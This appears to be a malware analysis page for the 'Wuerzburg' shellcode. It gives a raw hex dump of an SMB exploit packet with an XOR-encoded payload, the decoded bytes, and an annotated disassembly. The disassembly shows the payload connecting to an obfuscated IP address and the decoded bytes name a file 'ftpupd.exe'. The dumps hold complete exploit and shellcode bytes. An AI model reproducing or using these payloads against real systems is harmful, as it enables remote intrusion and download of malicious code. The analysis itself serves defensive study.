Wuerzburg Shellcode
Shellcode
raw
/*
00000000 00 00 0c f4 ff 53 4d 42 25 00 00 00 00 18 07 c8 |.....SMB%.......|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 08 dc 04 |................|
00000020 00 08 60 00 10 00 00 a0 0c 00 00 00 04 00 00 00 |..`.............|
00000030 00 00 00 00 00 00 00 00 00 54 00 a0 0c 54 00 02 |.........T...T..|
00000040 00 26 00 00 40 b1 0c 10 5c 00 50 00 49 00 50 00 |.&..@...\.P.I.P.|
00000050 45 00 5c 00 00 00 00 00 05 00 00 03 10 00 00 00 |E.\.............|
00000060 a0 0c 00 00 01 00 00 00 88 0c 00 00 00 00 09 00 |................|
00000070 ec 03 00 00 00 00 00 00 ec 03 00 00 90 90 90 90 |................|
00000080 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000110 90 90 90 90 90 90 90 90 90 90 90 90 eb 27 0b 29 |.............'.)|
00000120 6a 02 ab 85 5d 33 c9 66 b9 25 02 8d 75 05 8b fe |j...]3.f.%..u...|
00000130 8a 06 3c 99 75 05 46 8a 06 2c 30 46 34 99 88 07 |..<.u.F..,0F4...|
00000140 47 e2 ed eb 0a e8 da ff ff ff 2e 62 65 67 2e 71 |G..........beg.q|
00000150 93 99 c9 99 c9 99 c9 12 fd bd 91 fd 16 99 c9 c1 |................|
00000160 72 68 aa 42 fd 66 aa fd 10 ba 14 1c f1 98 99 c9 |rh.B.f..........|
00000170 99 c9 c9 f3 98 f1 98 99 c9 86 99 c9 71 09 98 99 |............q...|
00000180 c9 99 c9 90 5f cb 37 92 59 96 1c bb 98 99 c9 99 |...._.7.Y.......|
00000190 c9 18 75 99 c9 9b 99 c9 99 c9 cd f1 98 98 99 c9 |..u.............|
000001a0 99 c9 71 d2 98 99 c9 99 c9 e4 ec 47 54 18 5d 99 |..q........GT.].|
000001b0 c9 9b 99 c9 99 c9 f3 9f f3 98 f3 9b 71 af 98 99 |............q...|
000001c0 c9 99 c9 f3 68 e3 65 10 1c 1d 98 99 c9 99 c9 1a |....h.e.........|
000001d0 75 d9 ff 5e 9d bd 9b 99 c9 ff 12 dc 4d ff 10 dd |u..^........M...|
000001e0 bd 9b 12 dc 4f ac 33 33 33 33 10 dd bd 9d b2 59 |....O.3333.....Y|
000001f0 14 e5 bd 91 32 32 12 45 f3 89 ca 66 2c 1d 98 99 |....22.E...f,...|
00000200 c9 99 c9 71 6f 99 c9 99 c9 99 c9 13 67 41 74 1a |...qo.......gAt.|
00000210 5d d9 92 59 96 1c 34 99 c9 99 c9 99 c9 f3 9d f1 |]..Y..4.........|
00000220 99 c9 89 99 c9 99 c9 f1 99 c9 99 c9 98 99 c9 f3 |................|
00000230 99 c9 71 65 99 c9 99 c9 99 c9 67 f3 e3 f0 10 1c |..qe......g.....|
00000240 e5 98 99 c9 99 c9 f3 99 c9 f1 99 c9 99 c9 98 99 |................|
00000250 c9 c9 66 2c 1d 98 99 c9 99 c9 71 2e 99 c9 99 c9 |..f,......q.....|
00000260 99 c9 6f e8 c0 97 c9 f3 9b 66 2c 1d 98 99 c9 99 |..o......f,.....|
00000270 c9 71 3c 99 c9 99 c9 99 c9 d8 c1 e5 d5 b2 59 c9 |.q<...........Y.|
00000280 c9 f3 9b c9 c9 f1 99 c9 99 c9 99 c9 d9 14 04 f6 |................|
00000290 98 99 c9 99 c9 ca 71 29 99 c9 99 c9 99 c9 8d 68 |......q).......h|
000002a0 61 91 10 1c f2 98 99 c9 99 c9 c3 1a 61 66 ed a7 |a...........af..|
000002b0 cd 12 5d f3 99 c9 c9 cb 66 2c e5 98 99 c9 99 c9 |..].....f,......|
000002c0 66 2c f2 98 99 c9 99 c9 71 11 99 c9 99 c9 99 c9 |f,......q.......|
000002d0 5a 48 a6 96 c0 66 2c f2 98 99 c9 99 c9 71 e1 99 |ZH...f,......q..|
000002e0 c9 99 c9 99 c9 4c 29 a7 eb f3 9c 14 04 f6 98 99 |.....L).........|
000002f0 c9 99 c9 ca 71 ff 99 c9 99 c9 99 c9 34 f4 26 71 |....q.......4.&q|
00000300 f3 99 c9 71 c2 99 c9 99 c9 99 c9 f9 3b 13 ef ec |...q........;...|
00000310 a0 99 c9 99 c9 99 c9 99 c9 99 c9 b7 c5 ff ed e9 |................|
00000320 ec e9 fd b7 fc e1 fc 99 c9 99 c9 99 c9 99 c9 99 |................|
00000330 c9 99 c9 99 c9 99 c9 99 c9 99 c9 99 c9 99 c9 99 |................|
00000340 c9 ca f5 fc fc e9 99 c9 f2 fc eb f7 fc f5 aa ab |................|
00000350 99 c9 c7 34 f9 aa 59 b4 2d 2a 66 1e c9 ac e6 e7 |...4..Y.-*f.....|
00000360 b7 a5 c9 9c bd b8 9d 82 c9 cd 71 92 99 c9 99 c9 |..........q.....|
00000370 99 c9 bf 19 35 51 14 fd bd 95 0a 72 91 c7 34 f9 |....5Q.....r..4.|
00000380 71 c8 99 c9 99 c9 99 c9 12 d2 a5 12 d5 80 e1 9a |q...............|
00000390 52 aa 6f 14 8d 2a 9a c8 b9 12 8b 9a 4a aa 59 58 |R.o..*......J.YX|
000003a0 59 9e ab 9b db 19 a3 99 c9 ec 6c a2 dd bd 85 ed |Y.........l.....|
000003b0 9e df a2 e8 81 eb 44 55 12 c8 bd 9a 4a 96 2e 8d |......DU....J...|
000003c0 eb 12 d8 85 9a 5a 12 9d 09 9a 5a 10 dd bd 85 f8 |.....Z....Z.....|
000003d0 10 1c 19 98 99 c9 99 c9 66 49 66 7f fd fe 12 87 |........fIf.....|
000003e0 a9 99 c9 12 c2 95 12 c2 85 12 82 12 c2 91 5a b7 |..............Z.|
000003f0 fc f7 fd b7 90 90 90 90 90 90 90 90 90 90 90 90 |................|
00000400 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000820 90 90 90 90 90 90 90 90 00 46 00 01 90 90 90 90 |.........F......|
00000830 90 90 90 90 90 90 90 90 66 81 ec 1c 07 ff e4 90 |........f.......|
00000840 90 90 90 90 90 90 90 90 90 90 90 90 95 14 40 00 |..............@.|
00000850 03 00 00 00 7c 70 40 00 01 00 00 00 00 00 00 00 |....|p@.........|
00000860 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 |................|
*
00000890 01 00 00 00 00 00 00 00 7c 70 40 00 01 00 00 00 |........|p@.....|
000008a0 00 00 00 00 01 00 00 00 00 00 00 00 7c 70 40 00 |............|p@.|
000008b0 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 |................|
000008c0 7c 70 40 00 01 00 00 00 00 00 00 00 01 00 00 00 ||p@.............|
000008d0 00 00 00 00 78 85 13 00 ab 5b a6 e9 31 31 31 31 |....x....[..1111|
000008e0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 |1111111111111111|
*
00000cf0 31 31 31 31 31 31 31 00 |1111111.|
00000cf8
*/
unxor'd
00000000: 00 00 0c f4 ff 53 4d 42 - 25 00 00 00 00 18 07 c8 .....SMB ........
00000010: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 08 dc 04 ........ ........
00000020: 00 08 60 00 10 00 00 a0 - 0c 00 00 00 04 00 00 00 ........ ........
00000030: 00 00 00 00 00 00 00 00 - 00 54 00 a0 0c 54 00 02 ........ .T...T..
00000040: 00 26 00 00 40 b1 0c 10 - 5c 00 50 00 49 00 50 00 ........ ..P.I.P.
00000050: 45 00 5c 00 00 00 00 00 - 05 00 00 03 10 00 00 00 E....... ........
00000060: a0 0c 00 00 01 00 00 00 - 88 0c 00 00 00 00 09 00 ........ ........
00000070: ec 03 00 00 00 00 00 00 - ec 03 00 00 90 90 90 90 ........ ........
00000080: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000090: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000000a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000000b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000000c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000000d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000000e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000000f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000100: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000110: 90 90 90 90 90 90 90 90 - 90 90 90 90 eb 27 0b 29 ........ ........
00000120: 6a 02 ab 85 5d 33 c9 66 - b9 25 02 8d 75 05 8b fe j....3.f ....u...
00000130: 8a 06 3c 99 75 05 46 8a - 06 2c 30 46 34 99 88 07 ....u.F. ..0F4...
00000140: 47 e2 ed eb 0a e8 da ff - ff ff 2e 62 65 67 2e e8 G....... ...beg..
00000150: 0a 00 00 00 8b 64 24 08 - 64 8f 00 58 eb f1 33 db .....d.. d..X..3.
00000160: 64 ff 33 64 89 23 8d 85 - 68 01 00 00 50 6a 01 68 d.3d.... h...Pj.h
00000170: 01 00 1f 00 e8 90 01 00 - 00 09 c6 52 ae 0b c0 0f ........ ...R....
00000180: 85 22 01 00 00 81 ec 00 - 02 00 00 54 68 01 01 00 ........ ...Th...
00000190: 00 e8 4b 01 00 00 7d 75 - de cd 81 c4 00 02 00 00 ..K....u ........
000001a0: 6a 06 6a 01 6a 02 e8 36 - 01 00 00 6a f1 7a fc 89 j.j.j..6 ...j.z..
000001b0: 85 84 01 00 00 83 ec 40 - 66 c7 04 24 02 00 66 8b ........ f.....f.
000001c0: 45 d4 66 89 44 24 02 8b - 45 d6 35 aa aa aa aa 89 E.f.D... E.5.....
000001d0: 44 24 04 2b c0 8d 7c 24 - 08 ab ab 8b dc 6a 10 53 D....... .....j.S
000001e0: ff b5 84 01 00 00 e8 f6 - 00 00 00 8a fe d8 ed 83 ........ ........
000001f0: c4 40 0b c0 0f 85 ad 00 - 00 00 6a 04 68 00 10 00 ........ ..j.h...
00000200: 00 68 00 00 01 00 6a 00 - e8 fc 00 00 00 fe 6a 7a .h....j. ......jz
00000210: 69 89 85 7c 01 00 00 6a - 00 68 00 00 01 00 50 ff i......j .h....P.
00000220: b5 84 01 00 00 e8 b7 00 - 00 00 f6 71 59 0e 50 6a ........ ...qY.Pj
00000230: 02 ff b5 84 01 00 00 e8 - a5 00 00 00 41 58 7c 4c ........ ....AX.L
00000240: 2b c0 50 50 6a 02 50 50 - 68 00 00 00 40 8d 9d 6f ..PPj.PP h......o
00000250: 01 00 00 53 e8 b0 00 00 - 00 14 f1 f8 08 89 85 6b ...S.... .......k
00000260: 01 00 00 5a 83 f8 ff 74 - 3e 54 8b c4 6a 00 50 52 ...Z...t .T..j.PR
00000270: ff b5 7c 01 00 00 ff b5 - 6b 01 00 00 e8 88 00 00 ........ k.......
00000280: 00 c3 d1 3f 0f 59 ff b5 - 6b 01 00 00 e8 78 00 00 .....Y.. k....x..
00000290: 00 d5 b0 3e 72 6a 05 8d - 9d 6f 01 00 00 53 e8 66 ....rj.. .o...S.f
000002a0: 00 00 00 ad 6d bf e8 6a - 00 e8 5b 00 00 00 60 a2 ....m..j ........
000002b0: 8a 76 75 39 00 00 00 00 - 00 2e 5c 66 74 70 75 70 .vu9.... ...ftpup
000002c0: 64 2e 65 78 65 00 00 00 - 00 00 00 00 00 00 00 00 d.exe... ........
000002d0: 00 00 53 6c 65 65 70 00 - 6b 65 72 6e 65 6c 33 32 ..Sleep. kernel32
000002e0: 00 5e ad 60 33 c0 2d b4 - b3 ff 87 50 35 7f 7e 2e ....3... ...P5...
000002f0: 3c 50 05 24 21 04 1b 50 - 54 e8 0b 00 00 00 26 80 .P.....P T.......
00000300: ac c8 8d 64 24 0c 93 eb - 08 5e ad 60 e8 51 00 00 ...d.... .....Q..
00000310: 00 8b 4b 3c 8b 4c 19 78 - 03 cb 33 f6 8d 14 b3 03 ..K..L.x ..3.....
00000320: 51 20 8b 12 03 d3 33 c0 - c1 c0 07 32 02 42 80 3a Q.....3. ...2.B..
00000330: 00 75 f5 3b 44 24 1c 74 - 07 46 3b 71 18 72 dd cc .u..D..t .F.q.r..
00000340: 8b 51 24 03 d3 0f b7 14 - 72 8b 41 1c 03 c3 8b 04 .Q...... r.A.....
00000350: 90 03 c3 89 44 24 1c 61 - 89 85 80 01 00 00 ff d0 ....D..a ........
00000360: ff e6 64 67 8b 1e 30 00 - 8b 5b 0c 8b 5b 1c 8b 1b ..dg..0. ........
00000370: 8b 5b 08 c3 35 51 14 fd - bd 95 0a 72 91 c7 34 f9 ....5Q.. ...r..4.
00000380: 71 c8 99 c9 99 c9 99 c9 - 12 d2 a5 12 d5 80 e1 9a q....... ........
00000390: 52 aa 6f 14 8d 2a 9a c8 - b9 12 8b 9a 4a aa 59 58 R.o..... ....J.YX
000003a0: 59 9e ab 9b db 19 a3 99 - c9 ec 6c a2 dd bd 85 ed Y....... ..l.....
000003b0: 9e df a2 e8 81 eb 44 55 - 12 c8 bd 9a 4a 96 2e 8d ......DU ....J...
000003c0: eb 12 d8 85 9a 5a 12 9d - 09 9a 5a 10 dd bd 85 f8 .....Z.. ..Z.....
000003d0: 10 1c 19 98 99 c9 99 c9 - 66 49 66 7f fd fe 12 87 ........ fIf.....
000003e0: a9 99 c9 12 c2 95 12 c2 - 85 12 82 12 c2 91 5a b7 ........ ......Z.
000003f0: fc f7 fd b7 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000400: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000410: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000420: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000430: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000440: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000450: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000460: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000470: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000480: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000490: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000004f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000500: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000510: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000520: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000530: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000540: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000550: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000560: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000570: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000580: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000590: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000005a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000005b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000005c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000005d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000005e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000005f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000600: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000610: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000620: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000630: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000640: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000650: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000660: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000670: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000680: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000690: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000006a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000006b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000006c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000006d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000006e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000006f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000700: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000710: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000720: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000730: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000740: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000750: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000760: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000770: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000780: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000790: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000007a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000007b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000007c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000007d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000007e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
000007f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000800: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000810: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........
00000820: 90 90 90 90 90 90 90 90 - 00 46 00 01 90 90 90 90 ........ .F......
00000830: 90 90 90 90 90 90 90 90 - 66 81 ec 1c 07 ff e4 90 ........ f.......
00000840: 90 90 90 90 90 90 90 90 - 90 90 90 90 95 14 40 00 ........ ........
00000850: 03 00 00 00 7c 70 40 00 - 01 00 00 00 00 00 00 00 .....p.. ........
00000860: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........
00000870: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........
00000880: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........
00000890: 01 00 00 00 00 00 00 00 - 7c 70 40 00 01 00 00 00 ........ .p......
000008a0: 00 00 00 00 01 00 00 00 - 00 00 00 00 7c 70 40 00 ........ .....p..
000008b0: 01 00 00 00 00 00 00 00 - 01 00 00 00 00 00 00 00 ........ ........
000008c0: 7c 70 40 00 01 00 00 00 - 00 00 00 00 01 00 00 00 .p...... ........
000008d0: 00 00 00 00 78 85 13 00 - ab 5b a6 e9 31 31 31 31 ....x... ....1111
000008e0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
000008f0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000900: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000910: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000920: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000930: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000940: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000950: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000960: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000970: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000980: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000990: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
000009a0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
000009b0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
000009c0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
000009d0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
000009e0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
000009f0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000a90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000aa0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000ab0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000ac0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000ad0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000ae0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000af0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000b90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000ba0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000bb0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000bc0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000bd0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000be0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000bf0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c00: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c10: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c20: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c30: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c40: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c50: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c60: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c70: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c80: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000c90: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000ca0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000cb0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000cc0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000cd0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000ce0: 31 31 31 31 31 31 31 31 - 31 31 31 31 31 31 31 31 11111111 11111111
00000cf0: 31 31 31 31 31 31 31 00 - 00 1111111. .
Analysis
XOR decoder "wuerzburg xor"
0000011C ; ---------------------------------------------------------------------------
0000011C jmp short loc_145
0000011C ; ---------------------------------------------------------------------------
00000124 ; ---------------------------------------------------------------------------
00000124
00000124 loc_124:
00000124 pop ebp
00000125 xor ecx, ecx
00000127 mov cx, 225h
0000012B lea esi, [ebp+5]
0000012E mov edi, esi
00000130
00000130 loc_130:
00000130 mov al, [esi]
00000132 cmp al, 99h ; 'Ö'
00000134 jnz short loc_13B
00000136 inc esi
00000137 mov al, [esi]
00000139 sub al, 30h ; '0'
0000013B
0000013B loc_13B:
0000013B inc esi
0000013C xor al, 99h
0000013E mov [edi], al
00000140 inc edi
00000141 loop loc_130
00000143 jmp short loc_14F
00000145 ; ---------------------------------------------------------------------------
00000145
00000145 loc_145:
00000145 call loc_124
00000145 ; ---------------------------------------------------------------------------
0000014A db 2Eh ; .
0000014B db 62h ; b
0000014C db 65h ; e
0000014D db 67h ; g
0000014E db 2Eh ; .
unxor'd shellcode
0000011E dw 290Bh
00000120 dd 85AB026Ah ; IP XOR AAAAAAAAh
0000014F ; ---------------------------------------------------------------------------
0000014F
0000014F loc_14F:
0000014F call loc_15E
00000154 mov esp, [esp+8]
00000158 pop dword ptr fs:[eax]
0000015B pop eax
0000015C jmp short loc_14F
0000015E ; ---------------------------------------------------------------------------
0000015E
0000015E loc_15E:
0000015E xor ebx, ebx
00000160 push dword ptr fs:[ebx]
00000163 mov fs:[ebx], esp
00000166 lea eax, [ebp+168h] ; Mutex Name
0000016C push eax
0000016D push 1
0000016F push 1F0001h
00000174 call CallProcKernel32
00000174 ; ---------------------------------------------------------------------------
00000179 dd 0AE52C609h ; OpenMutexA
0000017D ; ---------------------------------------------------------------------------
0000017D or eax, eax
0000017F jnz loc_2A7
00000185 sub esp, 200h
0000018B push esp
0000018C push 101h
00000191 call CallProcWS2_32
00000191 ; ---------------------------------------------------------------------------
00000196 dd 0CDDE757Dh ; WSAStartup
0000019A ; ---------------------------------------------------------------------------
0000019A add esp, 200h
000001A0 push 6
000001A2 push 1
000001A4 push 2
000001A6 call CallProcWS2_32
000001A6 ; ---------------------------------------------------------------------------
000001AB dd 0FC7AF16Ah ; socket
000001AF ; ---------------------------------------------------------------------------
000001AF mov [ebp+184h], eax
000001B5 sub esp, 40h
000001B8 mov word ptr [esp], 2 ; sinfamiliy
000001BE mov ax, [ebp-2Ch]
000001C2 mov [esp+2], ax ; sinport
000001C7 mov eax, [ebp-2Ah]
000001CA xor eax, 0AAAAAAAAh
000001CF mov [esp+4], eax ; sinaddr
000001D3 sub eax, eax
000001D5 lea edi, [esp+8]
000001D9 stosd
000001DA stosd
000001DB mov ebx, esp
000001DD push 10h
000001DF push ebx
000001E0 push dword ptr [ebp+184h]
000001E6 call CallProcWS2_32
000001E6 ; ---------------------------------------------------------------------------
000001EB dd 0EDD8FE8Ah ; connect
